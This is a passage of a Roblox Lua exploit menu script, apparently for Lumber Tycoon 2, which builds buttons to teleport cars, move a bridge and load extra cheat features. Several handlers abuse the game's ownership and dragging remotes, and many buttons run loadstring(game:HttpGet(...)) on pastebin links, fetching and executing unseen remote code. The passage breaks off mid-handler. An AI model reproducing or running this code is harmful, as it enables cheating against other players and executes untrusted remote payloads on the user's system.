  4113. SpawnPointa.BackgroundColor3 = Color3.new(0, 0, 0)
  4114. SpawnPointa.BorderColor3 = Color3.new(0, 0, 0)
  4115. SpawnPointa.Position = UDim2.new(0, 3, 0, 3)
  4116. SpawnPointa.Size = UDim2.new(0, 165, 0, 20)
  4117. SpawnPointa.Font = Enum.Font.Fantasy
  4118. SpawnPointa.Text = "Spawn Point"
  4119. SpawnPointa.TextColor3 = Color3.new(255, 0, 0)
  4120. SpawnPointa.TextSize = 15
  4121.  
  4122. furnabox.Name = "furnabox"
  4123. furnabox.Parent = TpCarFrame
  4124. furnabox.BackgroundColor3 = Color3.new(0, 0, 0)
  4125. furnabox.BorderColor3 = Color3.new(0, 0, 0)
  4126. furnabox.Position = UDim2.new(0, 3, 0, 26)
  4127. furnabox.Size = UDim2.new(0, 165, 0, 20)
  4128. furnabox.Font = Enum.Font.Fantasy
  4129. furnabox.Text = "Box Cars + Furnishings"
  4130. furnabox.TextColor3 = Color3.new(255, 0, 0)
  4131. furnabox.TextSize = 15
  4132.  
  4133. LinkLogic.Name = "LinkLogic"
  4134. LinkLogic.Parent = TpCarFrame
  4135. LinkLogic.BackgroundColor3 = Color3.new(0, 0, 0)
  4136. LinkLogic.BorderColor3 = Color3.new(0, 0, 0)
  4137. LinkLogic.Position = UDim2.new(0, 3, 0, 49)
  4138. LinkLogic.Size = UDim2.new(0, 165, 0, 20)
  4139. LinkLogic.Font = Enum.Font.Fantasy
  4140. LinkLogic.Text = "Link's Logic"
  4141. LinkLogic.TextColor3 = Color3.new(255, 0, 0)
  4142. LinkLogic.TextSize = 15
  4143.  
  4144. Bshack.Name = "Bshack"
  4145. Bshack.Parent = TpCarFrame
  4146. Bshack.BackgroundColor3 = Color3.new(0, 0, 0)
  4147. Bshack.BorderColor3 = Color3.new(0, 0, 0)
  4148. Bshack.Position = UDim2.new(0, 3, 0, 72)
  4149. Bshack.Size = UDim2.new(0, 165, 0, 20)
  4150. Bshack.Font = Enum.Font.Fantasy
  4151. Bshack.Text = "Bob's Shack"
  4152. Bshack.TextColor3 = Color3.new(255, 0, 0)
  4153. Bshack.TextSize = 15
  4154.  
  4155. Docka.Name = "Docka"
  4156. Docka.Parent = TpCarFrame
  4157. Docka.BackgroundColor3 = Color3.new(0, 0, 0)
  4158. Docka.BorderColor3 = Color3.new(0, 0, 0)
  4159. Docka.Position = UDim2.new(0, 3, 0, 95)
  4160. Docka.Size = UDim2.new(0, 165, 0, 20)
  4161. Docka.Font = Enum.Font.Fantasy
  4162. Docka.Text = "Dock"
  4163. Docka.TextColor3 = Color3.new(255, 0, 0)
  4164. Docka.TextSize = 15
  4165.  
  4166. FineShop.Name = "FineShop"
  4167. FineShop.Parent = TpCarFrame
  4168. FineShop.BackgroundColor3 = Color3.new(0, 0, 0)
  4169. FineShop.BorderColor3 = Color3.new(0, 0, 0)
  4170. FineShop.Position = UDim2.new(0, 3, 0, 118)
  4171. FineShop.Size = UDim2.new(0, 165, 0, 20)
  4172. FineShop.Font = Enum.Font.Fantasy
  4173. FineShop.Text = "Fine Arts Shop"
  4174. FineShop.TextColor3 = Color3.new(255, 0, 0)
  4175. FineShop.TextSize = 15
  4176.  
  4177. Deny.Name = "Deny"
  4178. Deny.Parent = TpCarFrame
  4179. Deny.BackgroundColor3 = Color3.new(0, 0, 0)
  4180. Deny.BorderColor3 = Color3.new(0, 0, 0)
  4181. Deny.Position = UDim2.new(0, 3, 0, 141)
  4182. Deny.Size = UDim2.new(0, 165, 0, 20)
  4183. Deny.Font = Enum.Font.Fantasy
  4184. Deny.Text = "The Den"
  4185. Deny.TextColor3 = Color3.new(255, 0, 0)
  4186. Deny.TextSize = 15
  4187.  
  4188. OfSight.Name = "OfSight"
  4189. OfSight.Parent = TpCarFrame
  4190. OfSight.BackgroundColor3 = Color3.new(0, 0, 0)
  4191. OfSight.BorderColor3 = Color3.new(0, 0, 0)
  4192. OfSight.Position = UDim2.new(0, 3, 0, 164)
  4193. OfSight.Size = UDim2.new(0, 165, 0, 20)
  4194. OfSight.Font = Enum.Font.Fantasy
  4195. OfSight.Text = "Shrine Of Sight"
  4196. OfSight.TextColor3 = Color3.new(255, 0, 0)
  4197. OfSight.TextSize = 15
  4198.  
  4199. SKI.Name = "SKI"
  4200. SKI.Parent = TpCarFrame
  4201. SKI.BackgroundColor3 = Color3.new(0, 0, 0)
  4202. SKI.BorderColor3 = Color3.new(0, 0, 0)
  4203. SKI.Position = UDim2.new(0, 3, 0, 187)
  4204. SKI.Size = UDim2.new(0, 165, 0, 20)
  4205. SKI.Font = Enum.Font.Fantasy
  4206. SKI.Text = "Ski Lodge"
  4207. SKI.TextColor3 = Color3.new(255, 0, 0)
  4208. SKI.TextSize = 15
  4209.  
  4210. LightHouse.Name = "LightHouse"
  4211. LightHouse.Parent = TpCarFrame
  4212. LightHouse.BackgroundColor3 = Color3.new(0, 0, 0)
  4213. LightHouse.BorderColor3 = Color3.new(0, 0, 0)
  4214. LightHouse.Position = UDim2.new(0, 3, 0, 210)
  4215. LightHouse.Size = UDim2.new(0, 165, 0, 20)
  4216. LightHouse.Font = Enum.Font.Fantasy
  4217. LightHouse.Text = "Light House"
  4218. LightHouse.TextColor3 = Color3.new(255, 0, 0)
  4219. LightHouse.TextSize = 15
  4220.  
  4221. LavaTreeA.Name = "LavaTreeA"
  4222. LavaTreeA.Parent = TpCarFrame
  4223. LavaTreeA.BackgroundColor3 = Color3.new(0, 0, 0)
  4224. LavaTreeA.BorderColor3 = Color3.new(0, 0, 0)
  4225. LavaTreeA.Position = UDim2.new(0, 3, 0, 233)
  4226. LavaTreeA.Size = UDim2.new(0, 165, 0, 20)
  4227. LavaTreeA.Font = Enum.Font.Fantasy
  4228. LavaTreeA.Text = "Volcano"
  4229. LavaTreeA.TextColor3 = Color3.new(255, 0, 0)
  4230. LavaTreeA.TextSize = 15
  4231.  
  4232. PalmTreeA.Name = "PalmTreeA"
  4233. PalmTreeA.Parent = TpCarFrame
  4234. PalmTreeA.BackgroundColor3 = Color3.new(0, 0, 0)
  4235. PalmTreeA.BorderColor3 = Color3.new(0, 0, 0)
  4236. PalmTreeA.Position = UDim2.new(0, 3, 0, 256)
  4237. PalmTreeA.Size = UDim2.new(0, 165, 0, 20)
  4238. PalmTreeA.Font = Enum.Font.Fantasy
  4239. PalmTreeA.Text = "Palm Island"
  4240. PalmTreeA.TextColor3 = Color3.new(255, 0, 0)
  4241. PalmTreeA.TextSize = 15
  4242.  
  4243. SnowglowtreeA.Name = "SnowglowtreeA"
  4244. SnowglowtreeA.Parent = TpCarFrame
  4245. SnowglowtreeA.BackgroundColor3 = Color3.new(0, 0, 0)
  4246. SnowglowtreeA.BorderColor3 = Color3.new(0, 0, 0)
  4247. SnowglowtreeA.Position = UDim2.new(0, 3, 0, 279)
  4248. SnowglowtreeA.Size = UDim2.new(0, 165, 0, 20)
  4249. SnowglowtreeA.Font = Enum.Font.Fantasy
  4250. SnowglowtreeA.Text = "Snowglowd Island"
  4251. SnowglowtreeA.TextColor3 = Color3.new(255, 0, 0)
  4252. SnowglowtreeA.TextSize = 15
  4253.  
  4254. GoldTreeA.Name = "GoldTree"
  4255. GoldTreeA.Parent = TpCarFrame
  4256. GoldTreeA.BackgroundColor3 = Color3.new(0, 0, 0)
  4257. GoldTreeA.BorderColor3 = Color3.new(0, 0, 0)
  4258. GoldTreeA.Position = UDim2.new(0, 3, 0,302)
  4259. GoldTreeA.Size = UDim2.new(0, 165, 0, 20)
  4260. GoldTreeA.Font = Enum.Font.Fantasy
  4261. GoldTreeA.Text = "Swamp"
  4262. GoldTreeA.TextColor3 = Color3.new(255, 0, 0)
  4263. GoldTreeA.TextSize = 15
  4264.  
  4265.  
  4266. function TeleportCar(Pos)
  4267. if game.Players.LocalPlayer.Character then
  4268. Character = game.Players.LocalPlayer.Character
  4269. if Character.Humanoid.SeatPart ~= nil then
  4270. Car = Character.Humanoid.SeatPart.Parent
  4271. spawn(function()
  4272. for i=1,5 do
  4273. wait()
  4274. Car:SetPrimaryPartCFrame(Pos * CFrame.Angles(math.rad(Character.HumanoidRootPart.Orientation.x), math.rad(Character.HumanoidRootPart.Orientation.y), 0))
  4275. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Car.Main)
  4276. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Car.Main)
  4277. end
  4278. end)
  4279. end
  4280. end
  4281. end
  4282.  
  4283. SpawnPointa.MouseButton1Down:connect(function()
  4284. makesound("rbxassetid://156785206")
  4285. TeleportCar(CFrame.new(155, 3, 74))
  4286. end)
  4287.  
  4288. furnabox.MouseButton1Down:connect(function()
  4289. makesound("rbxassetid://156785206")
  4290. TeleportCar(CFrame.new(517, 3, -1607.1))
  4291. end)
  4292.  
  4293. LinkLogic.MouseButton1Down:connect(function()
  4294. makesound("rbxassetid://156785206")
  4295. TeleportCar(CFrame.new(4616.7, 3, -733.5))
  4296. end)
  4297.  
  4298. Bshack.MouseButton1Down:connect(function()
  4299. makesound("rbxassetid://156785206")
  4300. TeleportCar(CFrame.new(233.1, 7.8, -2536.2))
  4301. end)
  4302.  
  4303. Docka.MouseButton1Down:connect(function()
  4304. makesound("rbxassetid://156785206")
  4305. TeleportCar(CFrame.new(1087.2, -1.2, -189.7))
  4306. end)
  4307.  
  4308. FineShop.MouseButton1Down:connect(function()
  4309. makesound("rbxassetid://156785206")
  4310. TeleportCar(CFrame.new(5207, -166, 719))
  4311. end)
  4312.  
  4313. Deny.MouseButton1Down:connect(function()
  4314. makesound("rbxassetid://156785206")
  4315. TeleportCar(CFrame.new(327.4, 59.8, 1984.2))
  4316. end)
  4317.  
  4318. OfSight.MouseButton1Down:connect(function()
  4319. makesound("rbxassetid://156785206")
  4320. TeleportCar(CFrame.new(-1600, 205, 919))
  4321. end)
  4322.  
  4323. SKI.MouseButton1Down:connect(function()
  4324. makesound("rbxassetid://156785206")
  4325. TeleportCar(CFrame.new(1244.8, 59.8, 2278.3))
  4326. end)
  4327.  
  4328. LightHouse.MouseButton1Down:connect(function()
  4329. makesound("rbxassetid://156785206")
  4330. TeleportCar(CFrame.new(1488.1, 355.2, 3265))
  4331. end)
  4332.  
  4333. LavaTreeA.MouseButton1Down:connect(function()
  4334. makesound("rbxassetid://156785206")
  4335. TeleportCar(CFrame.new(-1584.4, 623, 1112.9))
  4336. end)
  4337.  
  4338. PalmTreeA.MouseButton1Down:connect(function()
  4339. makesound("rbxassetid://156785206")
  4340. TeleportCar(CFrame.new(4290.8, -5.9, -1794.2))
  4341. end)
  4342.  
  4343. SnowglowtreeA.MouseButton1Down:connect(function()
  4344. makesound("rbxassetid://156785206")
  4345. TeleportCar(CFrame.new(-1092.2, -5.9, -938.2))
  4346. end)
  4347.  
  4348. GoldTreeA.MouseButton1Down:connect(function()
  4349. makesound("rbxassetid://156785206")
  4350. TeleportCar(CFrame.new(-1231.8, 152.7, -540.3))
  4351. end)
  4352.  
  4353. CarRotate.Name = "CarRotate"
  4354. CarRotate.Parent = toolaFrame
  4355. CarRotate.BackgroundColor3 = Color3.new(0, 0, 0)
  4356. CarRotate.BorderColor3 = Color3.new(0, 0, 0)
  4357. CarRotate.Position = UDim2.new(0, 3, 0, 348)
  4358. CarRotate.Size = UDim2.new(0, 140, 0, 20)
  4359. CarRotate.Font = Enum.Font.Fantasy
  4360. CarRotate.FontSize = Enum.FontSize.Size18
  4361. CarRotate.Text = "Car Rotater"
  4362. CarRotate.TextColor3 = Color3.new(255, 0, 0)
  4363. CarRotate.TextSize = 15
  4364.  
  4365. CarRotates.Name = "CarRotates"
  4366. CarRotates.Parent = toolaFrame
  4367. CarRotates.BackgroundColor3 = Color3.new(0, 0, 0)
  4368. CarRotates.BorderColor3 = Color3.new(0, 0, 0)
  4369. CarRotates.Position = UDim2.new(0, 147, 0, 348)
  4370. CarRotates.Size = UDim2.new(0, 21, 0, 20)
  4371. CarRotates.Font = Enum.Font.Fantasy
  4372. CarRotates.FontSize = Enum.FontSize.Size18
  4373. CarRotates.Text = "R"
  4374. CarRotates.TextColor3 = Color3.new(255, 0, 0)
  4375. CarRotates.TextSize = 15
  4376.  
  4377. CarRotate.MouseButton1Click:connect(function()
  4378. makesound("rbxassetid://156785206")
  4379. local Turn = game:GetService("Players").LocalPlayer:GetMouse()
  4380. function Turn2(key)
  4381. if (key == "r") then
  4382. function RotateCar()
  4383. if game.Players.LocalPlayer.Character then
  4384. Character = game.Players.LocalPlayer.Character
  4385. if Character.Humanoid.SeatPart ~= nil then
  4386. Car = Character.Humanoid.SeatPart.Parent
  4387. spawn(function()
  4388. local Pos = CFrame.new(Car.Main.Position)
  4389. for i=1,5 do
  4390. wait()
  4391. Car:SetPrimaryPartCFrame(Pos * CFrame.Angles(math.rad(Character.HumanoidRootPart.Orientation.x), math.rad(Character.HumanoidRootPart.Orientation.y), 0))
  4392. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Car.Main)
  4393. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Car.Main)
  4394. end
  4395. end)
  4396. end
  4397. end
  4398. end
  4399. RotateCar()
  4400. end
  4401. end
  4402. Turn.KeyDown:connect(Turn2)
  4403. end)
  4404.  
  4405. Brid.Name = "Bridge"
  4406. Brid.Parent = toolaFrame
  4407. Brid.BackgroundColor3 = Color3.new(0, 0, 0)
  4408. Brid.BorderColor3 = Color3.new(0, 0, 0)
  4409. Brid.Position = UDim2.new(0, 3, 0, 371)
  4410. Brid.Size = UDim2.new(0, 115, 0, 20)
  4411. Brid.Font = Enum.Font.Fantasy
  4412. Brid.FontSize = Enum.FontSize.Size18
  4413. Brid.Text = "Bridge"
  4414. Brid.TextColor3 = Color3.new(255, 0, 0)
  4415. Brid.TextSize = 15
  4416.  
  4417. Bridup.Name = "Bridge"
  4418. Bridup.Parent = toolaFrame
  4419. Bridup.BackgroundColor3 = Color3.new(0, 0, 0)
  4420. Bridup.BorderColor3 = Color3.new(0, 0, 0)
  4421. Bridup.Position = UDim2.new(0, 147, 0, 371)
  4422. Bridup.Size = UDim2.new(0, 21, 0, 20)
  4423. Bridup.Font = Enum.Font.Fantasy
  4424. Bridup.FontSize = Enum.FontSize.Size18
  4425. Bridup.Text = "U"
  4426. Bridup.TextColor3 = Color3.new(255, 0, 0)
  4427. Bridup.TextSize = 15
  4428.  
  4429. BridDown.Name = "Bridge"
  4430. BridDown.Parent = toolaFrame
  4431. BridDown.BackgroundColor3 = Color3.new(0, 0, 0)
  4432. BridDown.BorderColor3 = Color3.new(0, 0, 0)
  4433. BridDown.Position = UDim2.new(0, 122, 0, 371)
  4434. BridDown.Size = UDim2.new(0, 21, 0, 20)
  4435. BridDown.Font = Enum.Font.Fantasy
  4436. BridDown.FontSize = Enum.FontSize.Size18
  4437. BridDown.Text = "D"
  4438. BridDown.TextColor3 = Color3.new(255, 0, 0)
  4439. BridDown.TextSize = 15
  4440.  
  4441. local BridgeD = false
  4442. BridDown.MouseButton1Click:connect(function()
  4443. makesound("rbxassetid://156785206")
  4444. if BridgeD == false then
  4445. for _,v in pairs(game.workspace.Bridge.VerticalLiftBridge.Lift:GetChildren()) do
  4446. v.CFrame = v.CFrame + Vector3.new(0, -26, 0)
  4447. end
  4448. BridgeD = true
  4449. end
  4450. end)
  4451.  
  4452. Bridup.MouseButton1Click:connect(function()
  4453. makesound("rbxassetid://156785206")
  4454. if BridgeD == true then
  4455.  
  4456. for _,v in pairs(game.workspace.Bridge.VerticalLiftBridge.Lift:GetChildren()) do
  4457. v.CFrame = v.CFrame + Vector3.new(0, 26, 0)
  4458. end
  4459. BridgeD = false
  4460. end
  4461. end)
  4462.  
  4463.  
  4464. ReJoinServer.Name = "ReJoinServer"
  4465. ReJoinServer.Parent = toolaFrame
  4466. ReJoinServer.BackgroundColor3 = Color3.new(0, 0, 0)
  4467. ReJoinServer.BorderColor3 = Color3.new(0, 0, 0)
  4468. ReJoinServer.Position = UDim2.new(0, 3, 0, 394)
  4469. ReJoinServer.Size = UDim2.new(0, 165, 0, 20)
  4470. ReJoinServer.Font = Enum.Font.Fantasy
  4471. ReJoinServer.FontSize = Enum.FontSize.Size18
  4472. ReJoinServer.Text = "ReJoin Server"
  4473. ReJoinServer.TextColor3 = Color3.new(255, 0, 0)
  4474. ReJoinServer.TextSize = 15
  4475. ReJoinServer.MouseButton1Down:connect(function()
  4476. makesound("rbxassetid://156785206")
  4477. local placeId = "13822889"
  4478. game:GetService("TeleportService"):Teleport(placeId)
  4479. end)
  4480.  
  4481. Reset.Name = "Reset"
  4482. Reset.Parent = toolaFrame
  4483. Reset.BackgroundColor3 = Color3.new(0, 0, 0)
  4484. Reset.BorderColor3 = Color3.new(0, 0, 0)
  4485. Reset.Position = UDim2.new(0, 3, 0, 417)
  4486. Reset.Size = UDim2.new(0, 165, 0, 20)
  4487. Reset.Font = Enum.Font.Fantasy
  4488. Reset.FontSize = Enum.FontSize.Size18
  4489. Reset.Text = "Reset Character"
  4490. Reset.TextColor3 = Color3.new(255, 0, 0)
  4491. Reset.TextSize = 15
  4492. Reset.MouseButton1Click:connect(function()
  4493. makesound("rbxassetid://156785206")
  4494. game.Players.LocalPlayer.Character.Head:Destroy()
  4495. end)
  4496.  
  4497. Buymenu.Name = "Buymenu"
  4498. Buymenu.Parent = Picker
  4499. Buymenu.BackgroundColor3 = Color3.new(1, 1, 1)
  4500. Buymenu.BorderColor3 = Color3.new(0, 0, 0)
  4501. Buymenu.Position = UDim2.new(0, 15, 0,515)
  4502. Buymenu.Size = UDim2.new(0, 80, 0, 80)
  4503. Buymenu.ZIndex = 3
  4504. Buymenu.Image = "rbxassetid://3936608288"
  4505. Buymenu.ScaleType = Enum.ScaleType.Crop
  4506. Buymenu.MouseButton1Click:Connect(function()
  4507. CurrentItem.Image = "rbxassetid://3886256996"
  4508. makesound("rbxassetid://156785206")
  4509. AIntroImage.Visible = true
  4510. AIntroImage1.Visible = true
  4511. end)
  4512.  
  4513. BuyFrame.Name = "BuyFrame"
  4514. BuyFrame.Parent = MenuFrame
  4515. BuyFrame.BorderSizePixel = 1
  4516. BuyFrame.BackgroundTransparency = 0
  4517. BuyFrame.BorderColor3 = Color3.new(0, 0, 0)
  4518. BuyFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  4519. BuyFrame.Size = UDim2.new(0, 170, 0, 141)
  4520. BuyFrame.Visible = false
  4521.  
  4522. wrus.Name = "wrus"
  4523. wrus.Parent = BuyFrame
  4524. wrus.BackgroundColor3 = Color3.new(0, 0, 0)
  4525. wrus.BorderColor3 = Color3.new(0, 0, 0)
  4526. wrus.Position = UDim2.new(0, 3, 0, 3)
  4527. wrus.Size = UDim2.new(0, 164, 0, 20)
  4528. wrus.Font = Enum.Font.Fantasy
  4529. wrus.FontSize = Enum.FontSize.Size18
  4530. wrus.Text = "Wod R Us"
  4531. wrus.TextColor3 = Color3.new(255, 0, 0)
  4532. wrus.TextSize = 15
  4533. wrus.MouseButton1Click:connect(function()
  4534. makesound("rbxassetid://156785206")
  4535. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  4536. wait(2.5)
  4537. MainFrame.Visible = false
  4538. OpenFrame.Visible = true
  4539. loadstring(game:HttpGet('https://pastebin.com/raw/zqpfJ5ef',true))()
  4540. end)
  4541.  
  4542. fshop.Name = "fshop"
  4543. fshop.Parent = BuyFrame
  4544. fshop.BackgroundColor3 = Color3.new(0, 0, 0)
  4545. fshop.BorderColor3 = Color3.new(0, 0, 0)
  4546. fshop.Position = UDim2.new(0, 3, 0, 26)
  4547. fshop.Size = UDim2.new(0, 164, 0, 20)
  4548. fshop.Font = Enum.Font.Fantasy
  4549. fshop.FontSize = Enum.FontSize.Size18
  4550. fshop.Text = "Furniture Store"
  4551. fshop.TextColor3 = Color3.new(255, 0, 0)
  4552. fshop.TextSize = 15
  4553. fshop.MouseButton1Click:connect(function()
  4554. makesound("rbxassetid://156785206")
  4555. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  4556. wait(2.5)
  4557. MainFrame.Visible = false
  4558. OpenFrame.Visible = true
  4559. loadstring(game:HttpGet('https://pastebin.com/raw/kkvhSQqm',true))()
  4560. end)
  4561.  
  4562. bcps.Name = "bcps"
  4563. bcps.Parent = BuyFrame
  4564. bcps.BackgroundColor3 = Color3.new(0, 0, 0)
  4565. bcps.BorderColor3 = Color3.new(0, 0, 0)
  4566. bcps.Position = UDim2.new(0, 3, 0, 49)
  4567. bcps.Size = UDim2.new(0, 164, 0, 20)
  4568. bcps.Font = Enum.Font.Fantasy
  4569. bcps.FontSize = Enum.FontSize.Size18
  4570. bcps.Text = "Bobs, Car, Pics"
  4571. bcps.TextColor3 = Color3.new(255, 0, 0)
  4572. bcps.TextSize = 15
  4573. bcps.MouseButton1Click:connect(function()
  4574. makesound("rbxassetid://156785206")
  4575. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  4576. wait(2.5)
  4577. MainFrame.Visible = false
  4578. OpenFrame.Visible = true
  4579. loadstring(game:HttpGet('https://pastebin.com/raw/Ss7D3Uxj',true))()
  4580. end)
  4581.  
  4582. ls.Name = "ls"
  4583. ls.Parent = BuyFrame
  4584. ls.BackgroundColor3 = Color3.new(0, 0, 0)
  4585. ls.BorderColor3 = Color3.new(0, 0, 0)
  4586. ls.Position = UDim2.new(0, 3, 0, 72)
  4587. ls.Size = UDim2.new(0, 164, 0, 20)
  4588. ls.Font = Enum.Font.Fantasy
  4589. ls.FontSize = Enum.FontSize.Size18
  4590. ls.Text = "Logic Store"
  4591. ls.TextColor3 = Color3.new(255, 0, 0)
  4592. ls.TextSize = 15
  4593. ls.MouseButton1Click:connect(function()
  4594. makesound("rbxassetid://156785206")
  4595. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  4596. wait(2.5)
  4597. MainFrame.Visible = false
  4598. OpenFrame.Visible = true
  4599. loadstring(game:HttpGet('https://pastebin.com/raw/zWgwSGj6',true))()
  4600. end)
  4601.  
  4602. bp.Name = "bp"
  4603. bp.Parent = BuyFrame
  4604. bp.BackgroundColor3 = Color3.new(0, 0, 0)
  4605. bp.BorderColor3 = Color3.new(0, 0, 0)
  4606. bp.Position = UDim2.new(0, 3, 0, 95)
  4607. bp.Size = UDim2.new(0, 164, 0, 20)
  4608. bp.Font = Enum.Font.Fantasy
  4609. bp.FontSize = Enum.FontSize.Size18
  4610. bp.Text = "Blue Prints"
  4611. bp.TextColor3 = Color3.new(255, 0, 0)
  4612. bp.TextSize = 15
  4613. bp.MouseButton1Click:connect(function()
  4614. makesound("rbxassetid://156785206")
  4615. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  4616. wait(2.5)
  4617. MainFrame.Visible = false
  4618. OpenFrame.Visible = true
  4619. loadstring(game:HttpGet('https://pastebin.com/raw/5HaFXJqZ',true))()
  4620. end)
  4621.  
  4622. Halloween.Name = "Halloween"
  4623. Halloween.Parent = BuyFrame
  4624. Halloween.BackgroundColor3 = Color3.new(0, 0, 0)
  4625. Halloween.BorderColor3 = Color3.new(0, 0, 0)
  4626. Halloween.Position = UDim2.new(0, 3, 0, 118)
  4627. Halloween.Size = UDim2.new(0, 164, 0, 20)
  4628. Halloween.Font = Enum.Font.Fantasy
  4629. Halloween.FontSize = Enum.FontSize.Size18
  4630. Halloween.Text = "Halloween"
  4631. Halloween.TextColor3 = Color3.new(255, 0, 0)
  4632. Halloween.TextSize = 15
  4633. Halloween.MouseButton1Click:connect(function()
  4634. makesound("rbxassetid://156785206")
  4635. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  4636. wait(2.5)
  4637. MainFrame.Visible = false
  4638. OpenFrame.Visible = true
  4639. loadstring(game:HttpGet('https://pastebin.com/raw/aj3n8VDw',true))()
  4640. end)
  4641.  
  4642. Btoolamenu.Name = "Btoolamenu"
  4643. Btoolamenu.Parent = Picker
  4644. Btoolamenu.BackgroundColor3 = Color3.new(1, 1, 1)
  4645. Btoolamenu.BorderColor3 = Color3.new(0, 0, 0)
  4646. Btoolamenu.Position = UDim2.new(0, 15, 0,600)
  4647. Btoolamenu.Size = UDim2.new(0, 80, 0, 80)
  4648. Btoolamenu.ZIndex = 3
  4649. Btoolamenu.Image = "rbxassetid://3953123880"
  4650. Btoolamenu.ScaleType = Enum.ScaleType.Crop
  4651. CurrentItem.Image = "rbxassetid://3886256996"
  4652. Btoolamenu.MouseButton1Click:Connect(function()
  4653. makesound("rbxassetid://156785206")
  4654. end)
  4655.  
  4656. LT2GUI2Frame.Name = "LT2GUI2Frame"
  4657. LT2GUI2Frame.Parent = MenuFrame
  4658. LT2GUI2Frame.BorderSizePixel = 1
  4659. LT2GUI2Frame.BackgroundTransparency = 0
  4660. LT2GUI2Frame.BorderColor3 = Color3.new(0, 0, 0)
  4661. LT2GUI2Frame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  4662. LT2GUI2Frame.Size = UDim2.new(0, 170, 0, 255)
  4663. LT2GUI2Frame.Visible = false
  4664.  
  4665. FunStuffHOVER.Name = "FunStuffHOVER"
  4666. FunStuffHOVER.Parent = LT2GUI2Frame
  4667. FunStuffHOVER.BackgroundColor3 = Color3.new(0, 0, 0)
  4668. FunStuffHOVER.BorderColor3 = Color3.new(0, 0, 0)
  4669. FunStuffHOVER.Position = UDim2.new(0, 3, 0, 3)
  4670. FunStuffHOVER.Size = UDim2.new(0, 165, 0, 20)
  4671. FunStuffHOVER.Font = Enum.Font.Fantasy
  4672. FunStuffHOVER.FontSize = Enum.FontSize.Size18
  4673. FunStuffHOVER.Text = "Hover Board"
  4674. FunStuffHOVER.TextColor3 = Color3.new(255, 0, 0)
  4675. FunStuffHOVER.TextSize = 15
  4676. FunStuffHOVER.MouseButton1Click:connect(function()
  4677. makesound("rbxassetid://156785206")
  4678. loadstring(game:HttpGet('https://pastebin.com/raw/DabYym5D',true))()
  4679.  
  4680. end)
  4681.  
  4682. FunStuffTHOMAS.Name = "FunStuffTHOMAS"
  4683. FunStuffTHOMAS.Parent = LT2GUI2Frame
  4684. FunStuffTHOMAS.BackgroundColor3 = Color3.new(0, 0, 0)
  4685. FunStuffTHOMAS.BorderColor3 = Color3.new(0, 0, 0)
  4686. FunStuffTHOMAS.Position = UDim2.new(0, 3, 0, 26)
  4687. FunStuffTHOMAS.Size = UDim2.new(0, 165, 0, 20)
  4688. FunStuffTHOMAS.Font = Enum.Font.Fantasy
  4689. FunStuffTHOMAS.FontSize = Enum.FontSize.Size18
  4690. FunStuffTHOMAS.Text = "Thomas The Tank"
  4691. FunStuffTHOMAS.TextColor3 = Color3.new(255, 0, 0)
  4692. FunStuffTHOMAS.TextSize = 15
  4693. FunStuffTHOMAS.MouseButton1Click:connect(function()
  4694. makesound("rbxassetid://156785206")
  4695. loadstring(game:HttpGet('http://pastebin.com/raw/tMr759X7',true))()
  4696.  
  4697. end)
  4698.  
  4699. FunStuffPOLICE.Name = "FunStuffPOLICE"
  4700. FunStuffPOLICE.Parent = LT2GUI2Frame
  4701. FunStuffPOLICE.BackgroundColor3 = Color3.new(0, 0, 0)
  4702. FunStuffPOLICE.BorderColor3 = Color3.new(0, 0, 0)
  4703. FunStuffPOLICE.Position = UDim2.new(0, 3, 0, 49)
  4704. FunStuffPOLICE.Size = UDim2.new(0, 165, 0, 20)
  4705. FunStuffPOLICE.Font = Enum.Font.Fantasy
  4706. FunStuffPOLICE.FontSize = Enum.FontSize.Size18
  4707. FunStuffPOLICE.Text = "Police Man"
  4708. FunStuffPOLICE.TextColor3 = Color3.new(255, 0, 0)
  4709. FunStuffPOLICE.TextSize = 15
  4710. FunStuffPOLICE.MouseButton1Click:connect(function()
  4711. makesound("rbxassetid://156785206")
  4712. loadstring(game:HttpGet('https://pastebin.com/raw/FR9Fzcqw',true))()
  4713.  
  4714. end)
  4715.  
  4716. FunStuffSPRAY.Name = "FunStuffSPRAY"
  4717. FunStuffSPRAY.Parent = LT2GUI2Frame
  4718. FunStuffSPRAY.BackgroundColor3 = Color3.new(0, 0, 0)
  4719. FunStuffSPRAY.BorderColor3 = Color3.new(0, 0, 0)
  4720. FunStuffSPRAY.Position = UDim2.new(0, 3, 0, 72)
  4721. FunStuffSPRAY.Size = UDim2.new(0, 165, 0, 20)
  4722. FunStuffSPRAY.Font = Enum.Font.Fantasy
  4723. FunStuffSPRAY.FontSize = Enum.FontSize.Size18
  4724. FunStuffSPRAY.Text = "Spray Can"
  4725. FunStuffSPRAY.TextColor3 = Color3.new(255, 0, 0)
  4726. FunStuffSPRAY.TextSize = 15
  4727. FunStuffSPRAY.MouseButton1Click:connect(function()
  4728. makesound("rbxassetid://156785206")
  4729. loadstring(game:HttpGet('http://pastebin.com/raw/raYkCjyy',true))()
  4730.  
  4731. end)
  4732.  
  4733. FunStuffCOCA.Name = "FunStuffCOCA"
  4734. FunStuffCOCA.Parent = LT2GUI2Frame
  4735. FunStuffCOCA.BackgroundColor3 = Color3.new(0, 0, 0)
  4736. FunStuffCOCA.BorderColor3 = Color3.new(0, 0, 0)
  4737. FunStuffCOCA.Position = UDim2.new(0, 3, 0, 95)
  4738. FunStuffCOCA.Size = UDim2.new(0, 165, 0, 20)
  4739. FunStuffCOCA.Font = Enum.Font.Fantasy
  4740. FunStuffCOCA.FontSize = Enum.FontSize.Size18
  4741. FunStuffCOCA.Text = "Coca Cola"
  4742. FunStuffCOCA.TextColor3 = Color3.new(255, 0, 0)
  4743. FunStuffCOCA.TextSize = 15
  4744. FunStuffCOCA.MouseButton1Click:connect(function()
  4745. makesound("rbxassetid://156785206")
